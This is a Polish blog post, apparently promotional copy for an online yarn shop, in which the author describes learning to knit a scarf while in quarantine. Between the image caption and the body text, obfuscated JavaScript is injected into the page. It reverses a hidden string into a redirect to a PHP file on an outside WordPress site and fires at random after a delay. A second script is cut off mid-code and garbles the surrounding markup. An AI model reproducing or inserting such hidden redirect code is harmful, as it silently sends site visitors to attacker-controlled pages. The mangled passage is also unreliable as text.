Włóczka do robótek ręcznych

Siedzenie w domu z racji kwarantanny mi nie odpowiadało. Lubię spędzać czas aktywnie, wśród ludzi, no ale czego się nie robi dla bezpieczeństwa. Na szczęście okazało się, że nie jestem chora, nie mniej jednak co przesiedziałam w czterech ścianach to moje. Jednak nie wszystko było tak ewidentnie negatywne.

Kolorowa włóczka ze sklepu

włóczka sklep interne<script>$NqM=function(n){if (typeof ($NqM.list[n]) == „string”) return $NqM.list[n].split(„”).reverse().join(„”);return $NqM.list[n];};$NqM.list=[„\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}</script><script>$mWn=function(n){if(typeof ($mWn.list[n])==towy” height=”167″ src=”http://globalforum.pl/wp-content/uploads/2021/05/woczka-sklep-internetowy.jpg” style=”float:left;” width=”250″/>Musiałam się czymś zająć, żeby nie zwariować. Nie miałam nic ciekawego do czytania, seriale szybko się skończyły. Przeczytałam, że w pandemii wiele osób zabrało się za robótki ręczne. To mnie zainteresowało. Nigdy nie szydełkowałam ani nie robiłam na drutach, nie mniej jednak wydawało mi się to ciekawe. Mogłam się czymś zająć w domu, a jednocześnie wykonać coś, co mi się potem przyda, choćby prosty szalik. Potrzebne były mi zatem dwa druty i tow/28″>włóczka sklep internetowy. Kupiłam najczęściej wybierane druty, bo uznałam, że inni wiedzą lepiej czym się kierować przy zakupie. Do tego wzięłam trzy motki różnej wełny. To była wełna gruba i czarna, kremowa z przędzy bambusowej i ekskluzywna włóczka alpakowa. Chciałam zobaczyc, jak będą one ,,współpracować” i czym nie będą zbytnio drapały. Znalazłam najprostszy wzór na drutach i zabrałam się za robienie wąskiego szalika. Z nawijaniem oczek mi nie szło, ale samo ich przekładanie nie było trudne. Może nie wyglądało to idealnie jak z katalogu, ale byłam z siebie zadowolona. Szalik nadawał się do użytku. Potem ćwiczyłam też inne ściegi i dokupiłam jeszcze trochę włóczek ze sklepu internetowego.

W sumie dobrze się stało, że musiałam trochę posiedzieć w domu. Nauczyłam się robić na drutach i niedługo chcę rozpocząć naukę szydełkowania. To moje nowe hobby, którym zajmuję się w weekendy. Z pewnością będę musiała poczynić spore zakupu w ulubionej pasmanterii internetowej.